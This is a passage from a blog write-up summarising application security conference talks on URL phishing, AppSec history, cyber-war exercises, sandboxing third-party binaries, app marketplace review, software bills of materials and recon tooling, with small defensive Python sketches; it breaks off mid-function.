End users generally don’t know how to validate domain URLs. In a user study, 2/3 of people presented with a Google login page on various TinyURL URLs said they would enter their credentials, even though they were told this was a study where there might be phishing.

On the other hand, technical users like the way URLs work now. If Google were to change the URL display to help convey to non technical users website identity, technical users may find it harder to get the info they want from it.

Formatting and displaying URLs is fundamentally hard: punycode and small window sizes (e.g. mobile) force you to choose what to display.
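Here's a small Python sketch of the punycode side of the problem, using the standard library's built-in `idna` codec. The lookalike domain is my own illustrative example, and this doesn't model the display rules any real browser applies.

```python
def to_ascii_hostname(hostname):
    """Return the ASCII (punycode) form of a hostname via Python's IDNA codec."""
    return hostname.encode("idna").decode("ascii")


real = "apple.com"
lookalike = "\u0430pple.com"  # first letter is Cyrillic U+0430, not Latin "a"

print(real == lookalike)             # False, although both can render alike
print(to_ascii_hostname(real))       # apple.com
print(to_ascii_hostname(lookalike))  # an "xn--" encoded form
```

Showing the Unicode form risks a convincing spoof, while showing the `xn--` form is unreadable for legitimate internationalized domains, which is exactly the kind of tradeoff the talk is about.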

Conclusion

Security is the art of managing risks and tradeoffs.

You’re often in a position where you want to build a new system or you want to make something better, but making it better doesn’t necessarily mean that you’re going to make everything better, it often means you’re going to have to balance the security risks with other types of usability costs or other types of product costs.

But nevertheless,

Dragons are worth slaying.

Impossible problems are tractable a bite at a time.

The Unabridged History of Application Security

Jim Manico, Founder, Manicode Security
abstract slides video

Jim gives a fun and engaging history of computer security, with an overall encouraging message:

Things are getting a lot better, and we should be proud of what we’ve done.

InfoSec started in October 1967, with a task force formed by ARPA (Advanced Research Projects Agency). The Rand Report R-609 (Security Controls for Computer Systems), which was declassified in 1975, then determined additional steps that should be taken to improve security.

History of AppSec: Security Testing
Firesheep played a critical role in getting popular web apps (e.g. Facebook, Twitter, GMail) to adopt TLS on more than just the login page.

Look at all we’ve accomplished as a community.

History of AppSec: OWASP Projects
ZAP and Dependency-Check have been incredibly valuable in pushing the security industry forward. If you’re going to sell a product, it had better at least be better than these open source tools.

For better and for worse, people point to us for advice as a community.

Jim aptly points out the importance of OWASP: the security industry, and the tech industry more broadly, relies on the recommendations of OWASP for what good security should look like, best practices to adopt, and more.

We have an obligation to take this trust seriously, and behave accordingly, with thoughtfulness and responsibility.

History of AppSec: XSS

Jim references a talk that describes how strict-dynamic can make rolling out CSP much easier, which I believe is the 2017 AppSec EU talk Making CSP great again! by Google Information Security Engineers Michele Spagnuolo and Lukas Weichselbaum (slides, video).

I found some other related info on this blog post: The new way of doing CSP takes the pain away.

History of AppSec: AppSec
History of AppSec: Future
Some humorous and some aspirational predictions about the future of security.



Misc

How to Start a Cyber War: Lessons from Brussels-EU Cyber Warfare Exercises

Christina Kubecka, CEO, HypaSec
abstract slides video

Chris describes her experiences running a workshop in Brussels with diplomats from various EU countries in which they collectively worked through a number of cyberwarfare-type scenarios.

This talk was a fascinating discussion of the interactions between technology, computer security, economics, and geopolitics.

Cyber War Scenarios

Scenarios discussed included:

  • A leak from an embassy staff family member
  • A breach from an intelligence agency mixed with a splash of extortion & tool leakage
  • Attacks against critical infrastructure across the EU and NATO members causing mass casualties

I highly recommend listening to these scenarios. They’re interesting, realistic, and demonstrate how intertwined technology, politics, and intra/international economies are. In security, we often focus on only the technical aspects. This talk is a great wake-up call to the broader implications of our field.

Elements of these scenarios are based on a combination of events that have actually happened as well as incidents that could feasibly occur.

For each scenario, attendees had to make tough decisions on how to respond. Should what occurred be considered “cyber warfare”? Should their country respond by doing nothing, rebuking the events, recalling or dismissing their diplomats from the responsible country, declaring solidarity with the victims, hacking back, declaring war, deploying nukes, some combination of these, or something else?

Cyber War: Warm-up Exercises
Cyber War: Dead Canary

How It Worked

Teams were switched between each scenario and given a different team advisor.

One thing that scared Chris was that there was no scenario in which everyone was able to come to a unanimous consensus. When attendees were broken up into smaller teams, though, they generally could come to a consensus.

The key takeaway was the importance of preparation. Many of the attending member states hadn’t done much preparation for these types of scenarios and hadn’t thought through what domino effect could occur.

For example, attacks on gas infrastructure could cause gas shortages, which if severe enough, could lead to police or ambulances not being able to respond to emergencies when needed.

Now when I last visited NATO headquarters in Brussels, I warned them, that if they didn’t get their defense spending up to 2% of their GDP…

Now is the time for Europe to stand on its own two feet. American blood will not be spilled.

AI in Warfare

Many countries are investing heavily in machine learning and AI, which will likely have huge impacts on warfare in the future.

Image/facial recognition, natural language processing, sentiment analysis, and other areas all have military applications.

We may see a future in which algorithms created by algorithms are deciding between life and death.

Conclusions

These types of scenarios are already occurring. They have happened, and will happen again in the future.

Many times dealing with these types of events takes friends. Do you know who your friends are? One of the problems in the EU right now is they’re unsure.

Making assumptions that other people will take care of security doesn’t work.

Assumptions are starting to kill people now.

Questions

The Q&A section was really interesting. Here are a few of the parts that stuck out to me.

Do you think cyber war in a conflict would be different than the low grade cyber war that happens every day?

Yes, in the way it would be executed, among other things.

About 6 months before any Russian boots were seen in the Crimean region, a researcher out of Ukraine found that a bunch of smart TV systems were being controlled by someone else, and channels were being switched to pro-Russian propaganda stations. They were trying to build support for Russia and specifically targeted the Crimean population.

On international jurisdiction

One challenge is that many EU nations disagree about jurisdiction during investigations or events that cross borders. Sometimes when you want to go after someone you can’t, which is a huge problem.

The EU actually leans heavily on the FBI to come out for major events.

The FBI assists with evidence collection, sorting out jurisdiction issues, helps with attorneys, puts pressure to try to extradite people, and is effective at getting proof/evidence from various countries. The FBI has significant valuable expertise.

The U.S. government shutdown has caused a problem for other countries, in that U.S. government agencies haven’t been able to help as they otherwise would.

How much of a problem will Brexit be?

A huge problem. Brexit is taking away the biggest military from the EU. If they also leave the Five Eyes, this will cause other member nations to lose valuable intelligence info.

We’re already seeing these effects now - they couldn’t come to an agreement on a border in Ireland so last week there was a car bomb.



Securing Third-Party Code

Behind the Scenes: Securing In-House Execution of Unsafe Third-Party Executables

Mukul Khullar, Staff Security Engineer, LinkedIn
abstract slides video

Many companies rely on third-party native executables for functionality like image and video processing. However, many of these tools are written in C or C++ and were not designed with security in mind. When a malicious user uploads a specially crafted file, it can lead to arbitrary command execution via a buffer overflow or command injection, arbitrary file read or write, and other bad outcomes.

Mukul recommends a three step defense-in-depth process for mitigating these risks.

1. Profile the executable

Do your homework:

  • What’s the security history of the code base? Any systemic issue classes? Do they fuzz it regularly?
  • Audit it for dangerous functionality - is there any unnecessary functionality you can disable?
  • Threat model the app’s attack surface - understand how data flows through it as well as its storage and networking requirements.

Profile the executable and determine the system calls it requires:

  • Install the latest version in a VM and run its test suite, or run it with the specific commands you’ll be using in production, using known good data.
  • Observe the system calls it makes using a tool like strace, then build a seccomp-bpf profile that blocks every syscall outside that required set. This minimizes the kernel attack surface exposed to the tool.
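The strace-to-profile step can be sketched roughly as follows. This is a minimal Python example under my own assumptions: the sample trace lines and the `/usr/bin/tool` path are made up, the regex only handles common strace line shapes, and the output uses the JSON layout I'd expect a Docker-style seccomp profile to have. Treat it as a starting point, not a finished policy generator.

```python
import json
import re

# Matches "name(" at the start of a line, optionally preceded by a PID
# prefix such as "[pid 4242] " or "4242 ". Signal and exit lines don't match.
SYSCALL_RE = re.compile(r"^(?:\[pid\s+\d+\]\s+|\d+\s+)?([a-z_][a-z0-9_]*)\(")


def syscalls_from_strace(lines):
    """Collect the distinct syscall names seen in strace output."""
    names = set()
    for line in lines:
        match = SYSCALL_RE.match(line)
        if match:
            names.add(match.group(1))
    return sorted(names)


def seccomp_profile(allowed):
    """Build an allowlist profile: deny by default, allow only observed calls."""
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "syscalls": [{"names": list(allowed), "action": "SCMP_ACT_ALLOW"}],
    }


# Hypothetical trace lines, for illustration only.
sample = [
    'execve("/usr/bin/tool", ["tool", "in.png"], 0x7ffc0 /* 12 vars */) = 0',
    'openat(AT_FDCWD, "in.png", O_RDONLY) = 3',
    '[pid 4242] read(3, "data", 4096) = 4',
    'read(3, "", 4096) = 0',
    "--- SIGCHLD {si_signo=SIGCHLD} ---",
    "+++ exited with 0 +++",
]

profile = seccomp_profile(syscalls_from_strace(sample))
print(json.dumps(profile, indent=2))
```

A profile built this way is only as complete as the runs you traced, so any code path you didn't exercise will fail in production when it hits a blocked syscall.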

Here there be dragons
As one of the audience questions pointed out, and based on my personal experience, this is easier said than done: creating the policies is hard (making sure you exercise all of the functionality you’ll require is nontrivial), and in some cases the tool may require a number of dangerous syscalls, like execve.

2. Harden the application layer

We also want to make the application itself as resistant to attack as possible.

Magic byte analysis: parse the initial few bytes of input file and match it against a known set of file signatures. This can be massively complex in practice, as file formats may be complex or polymorphic, with other file types nested inside.
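A minimal Python sketch of magic byte checking is below. The signature table covers just a few well-known formats, and the function names are mine. As noted above, real formats can be polymorphic or nest other file types, which a simple prefix check won't catch.

```python
# Leading bytes for a handful of common formats.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}


def sniff_type(header):
    """Return the format whose signature prefixes the given bytes, else None."""
    for name, prefixes in SIGNATURES.items():
        if header.startswith(prefixes):  # startswith accepts a tuple of prefixes
            return name
    return None


def matches_claimed_type(header, claimed):
    """Reject uploads whose content doesn't match the type they claim to be."""
    return sniff_type(header) == claimed
```

For example, `matches_claimed_type(data[:16], "png")` lets you reject a file uploaded as an image before it ever reaches the native tool.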

Input validation - the canonical “security thing you should do,” but still applies here.

Is there some expected structure or input restrictions you can apply immediately and reject inputs that don’t fulfill them? For example, a field may be a number, so restrict the input to 0-9.
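For the numeric field example, a strict allowlist check might look like this sketch. The field, the nine-digit cap, and the `max_value` bound are hypothetical; pick limits that match what your tool actually accepts.

```python
import re

# Only ASCII digits 0-9, with a length cap so huge inputs are rejected early.
_DIGITS = re.compile(r"[0-9]{1,9}")


def parse_count(raw, max_value=10_000):
    """Parse a numeric field, rejecting anything that isn't plain 0-9 digits."""
    if not _DIGITS.fullmatch(raw):
        raise ValueError("expected 1 to 9 ASCII digits")
    value = int(raw)
    if value > max_value:
        raise ValueError("value out of range")
    return value
```

Using `fullmatch` with an explicit `[0-9]` class avoids surprises like signs, whitespace, trailing newlines, or non-ASCII digit characters slipping through to the native executable.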

3. Secure the processing pipeline (harden your infrastructure, use secure network design)

Leverage sandboxing:

  • Run the tool as an unprivileged user in an ephemeral container (to limit persistence).
  • Restrict the app’s capabilities as much as possible by filtering syscalls, dropping privileges before running it, and using Linux namespaces and filesystem jails (like chroot). Google’s light-weight process isolation tool nsjail can also be useful.

Implement a secure network design: so that even if a compromise happens, the attacker has limited ability to pivot and access other systems.

Secure Network Design
Example secure network design
Execution Flow
Example process from end to end

Securing Third Party Applications at Scale

Ryan Flood, Manager of ProdSec, Salesforce
Prashanth Kannan, Product Security Engineer, Salesforce
abstract slides video

This talk describes each step of a methodology to secure third-party apps in general, and then how they do it at Salesforce. A nice combination of both principles and implementation.

If you don’t get the process right, the technical stuff goes to waste.

Background

The Salesforce AppExchange was launched in 2005 as a way for developers to create new functionality that extends and customizes Salesforce and sell these enhancements to Salesforce customers, like the Google Play store. Apps are written in their custom language, Apex.

There are a number of core challenges in third-party applications, including:

  • It’s someone else’s code that you don’t have access to
  • You can only test the end product, not evaluate the process (do they have a robust SDLC?)
  • Apps will change and add new features after you’ve reviewed them
  • They may integrate with other systems that you have no visibility into

One of the most important things is defining the problem. Unless you have an end goal in mind, unless you know what is in and out of scope, a lot of your work is going to go to waste.

Build Your Process
Salesforce’s App Review Process

1. Define the problem

  • Who are the third parties this process is supposed to help (vendors, partners, app developers, customers)?
  • What data and other access do they need?
    • Where possible implement restrictions in technical controls rather than policy controls.

Salesforce has built technical controls into the languages app developers use (Apex, Visualforce, Lightning, Lightning Web Components) and the Salesforce API, keeping apps from breaking out of the sandbox they’re placed in.

Salesforce has an install warning for apps they haven’t reviewed so that customers don’t think the apps have been vetted and place an undue amount of trust in them.

2. Establish baselines

Ensure that the third parties at least considered security: they have some security policy documents, a vulnerability disclosure policy, a security@ email address. Do they have a bug bounty or certs (e.g. ISO 27000/1, SOC 2, PCI)?

Once you decide the “bar to entry” for your marketplace, enforce it across all new apps/partners.

Put your requirement checklist out very publicly; talk about what you expect and why. You can sell this as a way to make the process faster and more scalable for business customers. This will save you significant communication time.

Salesforce has a gamified learning platform called Trailhead, which can be used to learn about the product. The security team created security-relevant content to put there as well as in the overall Salesforce docs. The security team brings the info they want customers to know wherever they are already.

AppExchange Security Review
Includes a requirements checklist and walk-through wizard

3. Assess

Now measure these partners against your security bar:

  • Security assessments: Ask if they can share any reports from pen tests they’ve received.
  • Security tools: Share the open source and commercial tools your company likes, and encourage the partners to scan themselves.
    • As you build automated scanning for your own use in scanning partner code and API endpoints, consider allowing the partners to leverage your tooling as well in a self-service manner.
  • Security Terms of Service or Contract Terms - Give yourself a way to hold partners accountable for fixing identified bugs and establish terms for what happens to developers who act in bad faith.

4. Remediation

How companies respond to issues you identify will reveal a lot about their commitment to security: the questions they ask, how fast they resolve issues, how good their fixes are, what they push back on, etc.

Offer support to help them pass the process. After all, this is making customers more secure.

At Salesforce, they:

  • Report findings with sufficient context and evidence of the vulnerability and include links to more information, based on industry best practice like OWASP.
  • Create disincentives to prevent “brute forcing” the process, for example, longer wait times.

Figure out what’s important to them and tie that to their security posture.

5. Monitor the Ecosystem

Have a single inventory of your third parties indexed on an important business asset that won’t get lost (e.g. vendor contracts, software licenses, API/OAuth credentials).

Track risk and impact related information, such as:

  • Usage metrics for an app and who’s using it (e.g. an app may be only used by a certain industry or type of user)
  • Prior security reviews - how have they done over time?
  • Any automated security information you can get

Salesforce has used this data to influence their product roadmap. For example, if they see that certain vulnerability classes are common or certain APIs tend to be misused, they’ll add additional security controls, documentation, or change how things work to try to make the ecosystem as a whole more secure.

Data-driven Product Security Improvements
This is a pretty neat application of metrics and worth reflecting on if your company has a popular API or supports third-party addons or plugins.

6. Security Check-ups

Periodically you’ll need to re-evaluate approved applications. This can be done after a certain amount of time, after a certain amount of code or API change, or based on the monetary impact of the partner on your business. Decide on a risk-based approach that makes sense for your company.
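The three triggers above (time, amount of change, business impact) can be sketched as a simple rule. Everything concrete here is hypothetical: the field names, the thresholds, and the idea of reviewing high-revenue partners on a shorter cycle are my illustration, not Salesforce's actual policy.

```python
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass
class ApprovedApp:
    name: str
    last_review: date
    changed_lines_since_review: int
    annual_revenue_usd: int


def needs_checkup(
    app,
    today,
    max_age=timedelta(days=365),             # time-based trigger
    max_changed_lines=5000,                  # change-based trigger
    high_impact_revenue=1_000_000,           # impact-based trigger
    high_impact_max_age=timedelta(days=180),
):
    """Return True when any of the re-review triggers fires."""
    age = today - app.last_review
    if age > max_age:
        return True
    if app.changed_lines_since_review > max_changed_lines:
        return True
    if app.annual_revenue_usd >= high_impact_revenue and age > high_impact_max_age:
        return True
    return False
```

Keeping the thresholds as parameters makes the risk appetite explicit and easy to revisit when new attack classes or policy changes come along.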

Check-ups also allow new security/policy measures to be applied to existing apps.

Note: Security is relative to your current environment; as new attack classes or vulnerabilities appear (e.g. HTTP desync attacks, new attacks on TLS), it’s important to re-evaluate.

The Salesforce AppExchange re-reviews apps based on time and impact and they run automated scans when apps are updated. New Salesforce platform launches can trigger checkups as well.

Good to Great

How to improve your review process over time.

Data Analysis on Review information

Data from past reviews of third-party apps is really helpful, for example:

  • Maybe your security team’s workload spikes at a certain time of year. You can prepare the security team’s schedule for it or hire contractors.
  • Time to review and types/number of vulnerabilities give insights like: tech stack X tends to have these vulns while language Y tends to have other vuln classes. Use this info to train your security engineers.

Label which apps and API endpoints have already been assessed to prevent duplicated work.

Evangelize and educate

Publish your security guidelines internally and externally, evangelize the process and educate the parties involved. Be very clear and consistent with your policy.

Educate your users on how to secure their applications to pass your process

  • Document good and bad examples for topics specific to your business domain
  • Rely on industry standards like OWASP whenever possible

Have security office hours where your customers can schedule time where you help them verify their architecture choices, address false positives, etc.

Automate to Scale

In the beginning, much of your process will be manual, which is OK. Gradually build automation over time into a unified system that includes metrics reporting and operational support.

Have app devs run the security tools your company uses on their app before they engage with you. This gives them earlier feedback so they can address issues before they even get to you, saving both of you time.

Create an Operations Team

They can be the liaison between third party app devs and your security engineering team.

  • This keeps app devs happy with fast responses from a dedicated team.
  • This is cost effective, as apps that are missing items to start the review process are caught before they take expensive security engineer time.
  • Faster time to resolution: nailing the basics with an operations team means less back-and-forth with third parties
Third Party App Provider, Operations, and Security Engineering

Tools to Kickstart Your process

Slack App Security: Securing your Workspaces from a Bot Uprising

Kelly Ann, Security Engineer, Slack
Nikki Brandt, Staff Security Engineer, Slack
abstract slides video

Kelly and Nikki discuss the fundamental challenges in securing Slack apps and the App Directory, the steps Slack is taking now, and what Slack is planning to do in the future.

Real Talk
One thing I appreciated about this talk is that Kelly and Nikki kept it real. Most blog posts, talks, other externally facing communications by companies who run marketplaces of third-party apps tend to frame things like, “Oh yeah, our marketplace is totally 110% secure, nothing bad could ever happen here.”

Of course it can! Random developers from around the world who you don’t know are writing code that extends your platform. Some of the developers could be malicious. Even the most advanced static and dynamic tooling in the world can’t with 100% accuracy identify all malicious applications, so unless you’ve solved the Halting Problem, there could be malicious apps you haven’t detected.

Kelly and Nikki are upfront about the security measures Slack is taking to secure the App Directory and the fundamental challenges in doing so. I find this openness admirable, and it’s an approach I’d love to see more companies take.

Slack Apps and the App Directory

The Slack App Directory is a marketplace for users to download Slack “apps” that extend Slack’s functionality in some way, often by integrating third-party services like Dropbox, GitHub, and Jira, to create a central place where work can be done (i.e. Slack), rather than forcing people to use many disparate applications.

Slack doesn’t charge for Slack apps “and never plans to,” so they have no incentive to let poor quality apps in. Many Slack apps are the result of a partnership between Slack and third-party developers.

Currently humans review every Slack app (more details later), but subsequent versions are not re-reviewed unless their OAuth scopes (i.e. permissions) change.

The Slack App Directory vs. other similar marketplaces:

  • Mobile stores (e.g. Google Play, iOS App Store) - similar in that it’s third-party code, but Google and Apple are receiving the app’s code, the code lives on user devices, they vet new versions of apps, and they have significantly more analysis automation in place (big companies with the time and budget to do so).
  • Browser extensions (e.g. Chrome and Firefox extensions) - similar in that the creator can change a Slack app or browser extension at any time without it being vetted. Extensions tend to be more single purpose or have isolated functionality, while Slack apps often tie into an external web application or service that can present a much larger attack surface.

So to reiterate, Slack faces a number of challenges in securing Slack apps:

  • They don’t get a copy of the source code.
  • They have no ability to see version changes unless OAuth scopes change.
  • Apps are typically backed by large, complex web apps that again, Slack has no visibility into.

Who owns the risk for Slack apps?

Technically and legally, the risk belongs to the creators of the third-party apps and the users who choose to install the apps in their workplace, but Slack feels like they own the risk and have an obligation to keep their users safe.

Securing Slack Apps: Now

Apps are installed in test workspaces and undergo the following tests:

  • Scopes are checked to ensure they follow the principle of least privilege - do the requested scopes make sense given the purpose of the app?
  • The app is scanned with two internal automated tools that look for low hanging fruit like a weak TLS configuration.
  • A small set of apps, those with the riskiest set of scopes, are manually pen tested by the Slack product security team or third-party pen testers.

Why isn’t this enough?

  • Slack apps are generally backed by web apps, so just because the Slack app itself appears safe doesn’t mean the service is overall safe for users.
  • Slack apps change over time.
  • There are a number of security tests that are challenging to perform automatically, for example, many apps have different installation flows.
  • Slack’s ProdSec team is small and this is just one of many of their responsibilities.

Securing Slack Apps: Future Options

There are a number of other things Slack could do in the future, but none of them are perfect.

Pentesting: There are too many apps for the ProdSec team to pentest themselves, but they could pay a third-party to.

  • Who pays for it? This could be cost prohibitive for a small dev shop and isn’t cheap for Slack either.
  • Pentests give you a point in time view, and Slack apps can change at any time.
  • Should just the Slack app or also the backing web app be in scope?

Certifications: Which ones would be appropriate to require or use? In the speakers’ opinion (and mine), certs often don’t really mean anything. Certs are also point in time: how and when would apps get recertified? Certs can also be quite costly.

Hosting Slack Apps: Slack themselves could host Slack apps, which would give them visibility into when apps are updated and what actions they’re performing. However, this would require a fair amount of infrastructure overhead and cost that Slack would have to take on, and running untrusted code in Slack’s environment introduces additional risk.

Compliance-focused vendor review: Slack’s risk and compliance team already vets vendors they use by asking them questions about their security posture. Slack could leverage this team and process for Slack app developers. But what questions should they ask, and wouldn’t they just be taking developers at their word (i.e. not confirm actual security controls and posture)?

Bug bounty: If the company behind a Slack app already has a bug bounty program, they could include their app in scope, or Slack could include apps in their bug bounty’s scope. There’s some precedent for the latter, as Google Play has a program on HackerOne for certain popular apps.

Combined risk score: By borrowing parts from each of the prior ideas, each Slack app could be given an aggregate risk score. There are some UX challenges here: how can the risk score be made understandable and accessible to less security-savvy users? If users see an app is rated “C+,” will they be scared off from using the app? This could negatively impact the creators of some Slack apps, but perhaps this would encourage better practices and be a net win. Could having a risk score especially impact small dev shops?

Q&A

Slack is in the process of building some automated tooling to detect when an app starts doing something unexpected, like making many API calls that are exfiltrating data. Slack is also working on finer-grained scopes.

Slack has an internal kill switch for apps - if an app is misbehaving, they can quickly disable all existing tokens for it.

Slack is pretty aggressive about delisting apps - if an app isn’t working properly or they reach out to an app’s listed point of contact and they don’t respond relatively quickly, Slack will temporarily disable the app.

Slack has an evolving risk score used internally, and one of the inputs is the app’s requested scopes. Some scopes automatically jump an app right to the top of the risk scoring, for example, the admin scope, which enables an app to do anything an org admin can do.
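To make the scope-driven scoring idea a bit more concrete, here is a minimal sketch. Slack didn't share how its internal score is computed, so the weights, the default weight, the cap, and the `risk_score` function are all hypothetical; the only part taken from the talk is that some scopes, like admin, push an app straight to the top.

```python
# Hypothetical weights for illustration; Slack's real inputs and values were not shared.
SCOPE_WEIGHTS = {
    "admin": 100,            # per the talk, this scope jumps an app to the top
    "files:read": 30,        # assumed weight
    "channels:history": 30,  # assumed weight
    "chat:write": 10,        # assumed weight
}
DEFAULT_WEIGHT = 5  # assumption: scopes not listed above get a small baseline weight
MAX_SCORE = 100


def risk_score(scopes):
    """Return a 0-100 score; any maximum-weight scope pins the score at the cap."""
    total = sum(SCOPE_WEIGHTS.get(scope, DEFAULT_WEIGHT) for scope in set(scopes))
    return min(total, MAX_SCORE)
```

A real score would presumably fold in other inputs too (the talk only says scopes are "one of the inputs"), but even a crude version like this can help decide which apps get manual review first.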



Security Tooling

BoMs Away - Why Everyone Should Have a BoM

Steve Springett, Senior Security Architect, ServiceNow
abstract slides video source code

In this talk, Steve describes the various use cases of a software bill-of-materials (BOM), including facilitating accurate vulnerability and other supply-chain risk analysis, and gives a demo of OWASP Dependency-Track, an open source supply chain component analysis platform.

A software bill-of-materials (BOM) is the software equivalent of a nutrition label on food: it tells you what’s inside, so you can make an informed decision. This is a relatively new area of focus in the security and tech industry in general, but it is quite important, as it helps facilitate accurate vulnerability and other supply-chain risk analysis.

Steve is the creator of OWASP Dependency-Track, an open source supply chain component analysis platform, a contributor to OWASP Dependency-Check, and is involved in a number of other software transparency-related projects and working groups, so he knows the space quite well.

There are a number of factors contributing to the increased emphasis on BOMs, including:

  • Compliance
  • Regulation - The FDA is going to start requiring medical devices to have a cybersecurity BOM, including info on used commercial and open source software as well as hardware.
  • Economic / supply-chain management, market forces - Companies may want to use fewer and better suppliers, BOMs are sometimes required during procurement.

An interesting anecdote Steve mentioned is that in some cases, a vendor not being able to provide a BOM has led the purchasing company to demand a 20%-30% discount, as they’ll need to take on the operational cost of determining the software’s BOM themselves, and the missing BOM indicates a lack of SDLC maturity and thus increased risk.

MITRE has published a 56 page document about supply chain security: Deliver Uncompromised: A Strategy for Supply Chain Security and Resilience in Response to the Changing Character of War.

What’s a BOM good for?

BOMs have a number of common use cases, including:

  • License identification and compliance
  • Outdated component analysis
  • Vulnerability analysis (software and hardware)
  • Documenting direct, transitive, runtime, and environmental dependencies
  • File verification (via hash checking)
  • Hierarchical (system, sub-system, etc) representation of component usage
  • Tracking component pedigree (ancestors from which a component is derived)
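As one example, the file verification use case boils down to comparing a component's digest with the hash recorded in the BOM. Here is a minimal sketch using SHA-256; the `verify_component` name is mine, and a real BOM may record several hash algorithms per component.

```python
import hashlib


def verify_component(data: bytes, expected_sha256: str) -> bool:
    """Compare a component's SHA-256 digest to the hex digest recorded in the BOM."""
    actual = hashlib.sha256(data).hexdigest()
    return actual == expected_sha256.strip().lower()
```

You'd read the component's bytes from disk and pull the expected hash from the BOM entry for that component.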

What does a BOM look like?

There are several older BOM formats, including Software Package Data Exchange (SPDX) and Software Identification (SWID): ISO/IEC 19770-2:2015. However, these did not fulfill Steve’s desired use cases, so he created the CycloneDX spec, which is lightweight and focuses on security.

CycloneDX uses a Package URL to uniquely identify a version of a dependency and its place within an ecosystem. It looks like this:

pkg:maven/org.jboss.resteasy/resteasy-jaxrs@3.1.0-Final?type=jar

The Package URL identifies all relevant component metadata, including ecosystem (type), group (namespace), name, version, and key/value pair qualifiers.

One great aspect of this approach is that it’s ecosystem-agnostic: it can support dependencies on Maven, Docker, NPM, RPM, etc.
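To show how those parts map onto the string, here is a simplified sketch of splitting a Package URL. The `parse_purl` function is my own illustration, not part of CycloneDX or Dependency-Track, and it skips a number of details from the Package URL spec (subpaths are dropped, and type-specific normalization rules are ignored).

```python
from urllib.parse import parse_qsl, unquote


def parse_purl(purl: str) -> dict:
    """Split a Package URL into its parts (simplified; the subpath is discarded)."""
    scheme, _, rest = purl.partition(":")
    if scheme != "pkg":
        raise ValueError("not a Package URL")
    rest, _, _subpath = rest.partition("#")  # optional '#subpath', ignored here
    rest, _, query = rest.partition("?")     # optional '?key=value' qualifiers
    if "@" in rest:
        path, _, version = rest.rpartition("@")
    else:
        path, version = rest, ""
    segments = path.strip("/").split("/")
    if len(segments) < 2:
        raise ValueError("expected at least a type and a name")
    return {
        "type": segments[0].lower(),
        "namespace": "/".join(segments[1:-1]) or None,
        "name": unquote(segments[-1]),
        "version": unquote(version) or None,
        "qualifiers": dict(parse_qsl(query)),
    }
```

Running it on the example above yields type `maven`, namespace `org.jboss.resteasy`, name `resteasy-jaxrs`, version `3.1.0-Final`, and a single `type=jar` qualifier. For anything beyond a quick experiment, an existing Package URL library is a better choice than a hand-rolled parser.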

Java Maven Example Hardware Example
Examples of a CycloneDX BOM for a Maven Java dependency and hardware.

At 15:17, Steve does a demo of Dependency-Track, showing how it can be integrated into Jenkins and used to create a combined BOM for Java and NodeJS dependencies.

BOMs Away: Dependency-Track Features

Dependency-Track is Apache 2.0 licensed and its source code is available on GitHub. It has social media accounts on Twitter, YouTube, and Peerlyst; see the following links for its documentation and homepage.

More than just third-party libs
One thing I found interesting, that I hadn’t thought of before, is that you can capture a number of aspects of a piece of software in a BOM, beyond just third-party dependencies; for example, the app’s environment, runtime, and hardware dependencies.

Endpoint Finder: A static analysis tool to find web endpoints

Olivier Arteau, Desjardins
abstract slides video source code

After presenting about his new bug class, Prototype pollution attacks in NodeJS applications at NorthSec 2018 (which by the way made it into Portswigger’s Top 10 Web Hacking Techniques of 2018), Olivier needed a better way to analyze JavaScript code at scale.

Existing tools were either dead, regex-based, or didn’t support the analysis capabilities he wanted, so he built and open sourced endpointfinder, which parses JavaScript code into Abstract Syntax Trees (ASTs) to determine the routes that are defined (e.g. $.get() or open() calls on an object of type XMLHttpRequest). These results can be automatically imported via an accompanying Burp or ZAP plugin.
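To illustrate why matching on an AST beats regex for this kind of task, here is a small analogy using Python's built-in `ast` module against Python source. This is not how endpointfinder is implemented (it targets JavaScript), and the `find_endpoints` function and the set of method names are assumptions for the sketch.

```python
import ast

HTTP_METHODS = {"get", "post", "put", "delete"}  # assumed set, for illustration


def find_endpoints(source: str):
    """Return (method, url) pairs for calls like client.get("/path") with a literal URL."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in HTTP_METHODS
            and node.args
            and isinstance(node.args[0], ast.Constant)
            and isinstance(node.args[0].value, str)
        ):
            found.append((node.func.attr, node.args[0].value))
    return found
```

Because it works on the parsed tree, this ignores calls that only appear inside comments or string literals, which a naive regex would happily report. It also only handles literal URLs; reasoning about variables and string concatenation is where the real work in a tool like endpointfinder lies.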

Endpoint Finder: Scope

I’m a big fan of the power of AST matching over regex (after all, I gave a talk at ShellCon 2019 about it), so I’m glad this work was done.

That said, I feel like Olivier’s use of the term “symbolic” is a bit misleading (to me, it hints at symbolic execution, which this is not), and I think his use of the term “call graph” is a bit different than what’s agreed upon in the program analysis community.

I like this talk, but I think the terminology and approach taken (e.g. when reasoning about variable values and function calls) would benefit from doing a bit of a literature survey.

See the summary for The White Hat’s Advantage: Open-source OWASP tools to aid in penetration testing coverage for a discussion of OWASP Attack Surface Detector, which also uses static analysis to find routes for web frameworks in Java (JSPs, Servlets, Struts, Spring MVC), C# (ASP.NET MVC, Web Forms), Rails, and Django.

Pose a Threat: How Perceptual Analysis Helps Bug Hunters

Rob Ragan, Partner, Bishop Fox
Oscar Salazar, Managing Security Associate, Bishop Fox
summary abstract slides video

The speakers describe how to make external network penetration tests more effective by auto-screenshotting exposed websites and then clustering them based on visual similarity.

At a high level, their approach is:

  1. OSINT (OWASP AMASS) is used to find target domains and subdomains.
  2. Threat intel, wordlists, and other sources are used to find interesting paths to check.
  3. AWS Lambdas are spun up that use headless Chrome to screenshot these paths.
  4. Shrunk screenshots are stored in S3, response bodies and headers are stored in Elasticsearch. Screenshots are grouped by similarity using fuzzy hashing.
  5. Humans review sorted screenshots for leaked sensitive data or promising targets to attack.
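The grouping in step 4 can be sketched with a very simple perceptual hash. This summary doesn't say which algorithm the speakers used, so what follows swaps in a basic "average hash" plus Hamming distance as a stand-in; the function names, the distance threshold, and the greedy grouping strategy are all my assumptions.

```python
def average_hash(pixels):
    """Hash a small grayscale image (list of rows of 0-255 ints).

    Produces one bit per pixel, set when the pixel is brighter than the image mean.
    """
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    return tuple(1 if p > mean else 0 for p in flat)


def hamming(a, b):
    """Number of differing bits between two equal-length hashes."""
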